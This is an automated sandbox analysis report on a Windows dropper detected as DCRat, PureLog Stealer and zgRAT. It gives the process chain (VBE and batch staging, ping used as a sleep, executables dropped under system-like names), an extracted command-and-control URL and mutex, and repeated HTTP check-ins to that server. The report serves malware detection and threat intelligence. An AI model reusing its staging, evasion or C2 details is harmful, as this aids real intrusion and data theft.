Edit tour

Windows Analysis Report
kqq1aAcVUQ.exe

Overview

General Information

Sample name:	kqq1aAcVUQ.exe renamed because original name is a hash value
Original sample name:	6697A39548B61FCFCF800B206BDBD696.exe
Analysis ID:	1569655
MD5:	6697a39548b61fcfcf800b206bdbd696
SHA1:	85229cee44c412c1f0f6a17562272a1296072815
SHA256:	ff3ec61937bba7d0b4fd993698f3d2a8ba77e4630ed293e4a3e3d0254dc1de50
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

AI detected suspicious sample

Drops PE files with benign system names

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Sigma detected: Files With System Process Name In Unsuspected Locations

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

kqq1aAcVUQ.exe (PID: 504 cmdline: "C:\Users\user\Desktop\kqq1aAcVUQ.exe" MD5: 6697A39548B61FCFCF800B206BDBD696)

wscript.exe (PID: 4824 cmdline: "C:\Windows\System32\WScript.exe" "C:\webCrt\gSYhm1mlqujwdrrg55.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 4828 cmdline: C:\Windows\system32\cmd.exe /c ""C:\webCrt\bGFjXvZl1lSOMhHdLYZAxlDgwJSuyymnPovMq1RpYbZnEgpXBO1nwlMonY.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Surrogatedll.exe (PID: 364 cmdline: "C:\webCrt/Surrogatedll.exe" MD5: 9FC3AB56804D6BA50E840846783E8AC1)

cmd.exe (PID: 3428 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8438IKeNWT.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 5716 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 5772 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

EeMFgDHDyZvTl.exe (PID: 1088 cmdline: "C:\Recovery\EeMFgDHDyZvTl.exe" MD5: 9FC3AB56804D6BA50E840846783E8AC1)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://319351cm.nyashteam.ru/Providerto_pollProcessorbigloadprotectSqlWpLocal", "MUTEX": "DCR_MUTEX-v4jM5EqcBKIc3KhugfDk"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Windows\Globalization\Time Zone\lsass.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Windows\Globalization\Time Zone\lsass.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\EeMFgDHDyZvTl.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Recovery\EeMFgDHDyZvTl.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\webCrt\Surrogatedll.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\webCrt\Surrogatedll.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\webCrt\Surrogatedll.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\webCrt\Surrogatedll.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\webCrt\Surrogatedll.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\webCrt\Surrogatedll.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\webCrt\Surrogatedll.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\webCrt\Surrogatedll.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 7 entries

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2105495821.000000000532A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000B.00000002.4562754351.00000000031C5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000005.00000000.2178061238.0000000000F12000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000B.00000002.4562754351.000000000304E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000005.00000002.2205708195.00000000135FC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: Surrogatedll.exe PID: 364	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: EeMFgDHDyZvTl.exe PID: 1088	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.0.Surrogatedll.exe.f10000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
5.0.Surrogatedll.exe.f10000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\webCrt\Surrogatedll.exe, ProcessId: 364, TargetFilename: C:\Windows\Globalization\Time Zone\lsass.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\webCrt\gSYhm1mlqujwdrrg55.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\webCrt\gSYhm1mlqujwdrrg55.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\kqq1aAcVUQ.exe", ParentImage: C:\Users\user\Desktop\kqq1aAcVUQ.exe, ParentProcessId: 504, ParentProcessName: kqq1aAcVUQ.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\webCrt\gSYhm1mlqujwdrrg55.vbe" , ProcessId: 4824, ProcessName: wscript.exe

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-06T03:12:19.123901+0100	2048095	1	A Network Trojan was detected	192.168.2.6	49737	172.67.186.200	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://319351cm.nyashteam.ru/	Avira URL Cloud: Label: malware
Source: http://319351cm.nyashteam.ru	Avira URL Cloud: Label: malware
Source: http://319351cm.nyashteam.ru/Providerto_pollProcessorbigloadprotectSqlWpLocal.php	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Recovery\EeMFgDHDyZvTl.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\nukLNhSq.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\AppData\Local\Temp\8438IKeNWT.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\webCrt\gSYhm1mlqujwdrrg55.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\webCrt\Surrogatedll.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\hACmhobX.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\Desktop\eMRvdFMJ.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\Desktop\RyxhNllI.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Windows\Globalization\Time Zone\lsass.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342

Found malware configuration

Source: 00000005.00000002.2205708195.00000000135FC000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"C2 url": "http://319351cm.nyashteam.ru/Providerto_pollProcessorbigloadprotectSqlWpLocal", "MUTEX": "DCR_MUTEX-v4jM5EqcBKIc3KhugfDk"}

Multi AV Scanner detection for dropped file

Source: C:\Recovery\EeMFgDHDyZvTl.exe	ReversingLabs: Detection: 63%
Source: C:\Users\Public\Pictures\EeMFgDHDyZvTl.exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\Desktop\KCOiojdz.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\RyxhNllI.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\eMRvdFMJ.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\hACmhobX.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\nukLNhSq.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\rrFUvAHK.log	ReversingLabs: Detection: 25%
Source: C:\Windows\Cursors\EeMFgDHDyZvTl.exe	ReversingLabs: Detection: 63%
Source: C:\Windows\Globalization\Time Zone\lsass.exe	ReversingLabs: Detection: 63%
Source: C:\webCrt\EeMFgDHDyZvTl.exe	ReversingLabs: Detection: 63%
Source: C:\webCrt\Surrogatedll.exe	ReversingLabs: Detection: 63%

Multi AV Scanner detection for submitted file

Source: kqq1aAcVUQ.exe	ReversingLabs: Detection: 79%
Source: kqq1aAcVUQ.exe	Virustotal: Detection: 52%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.5% probability

Machine Learning detection for dropped file

Source: C:\Recovery\EeMFgDHDyZvTl.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\nukLNhSq.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\DWhAaqcM.log	Joe Sandbox ML: detected
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Joe Sandbox ML: detected
Source: C:\webCrt\Surrogatedll.exe	Joe Sandbox ML: detected
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\hACmhobX.log	Joe Sandbox ML: detected
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\IPdRdIgb.log	Joe Sandbox ML: detected
Source: C:\Windows\Globalization\Time Zone\lsass.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: kqq1aAcVUQ.exe

Joe Sandbox ML: detected

Source: kqq1aAcVUQ.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: kqq1aAcVUQ.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kqq1aAcVUQ.exe

Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_0022A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_0022A69B
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_0023C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_0023C220
Source: C:\Users\user\Desktop\kqq1aAcVUQ.exe	Code function: 0_2_0024B348 FindFirstFileExA,	0_2_0024B348

Source: C:\webCrt\Surrogatedll.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49737 -> 172.67.186.200:80

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 384Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1296Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1296Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1008Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1296Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1296Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 996Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1296Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1296Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1268Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1008Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1296Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Providerto_pollProcessorbigloadprotectSqlWpLocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 319351cm.nyashteam.ruContent-Length: 1012Expect: 100-continue
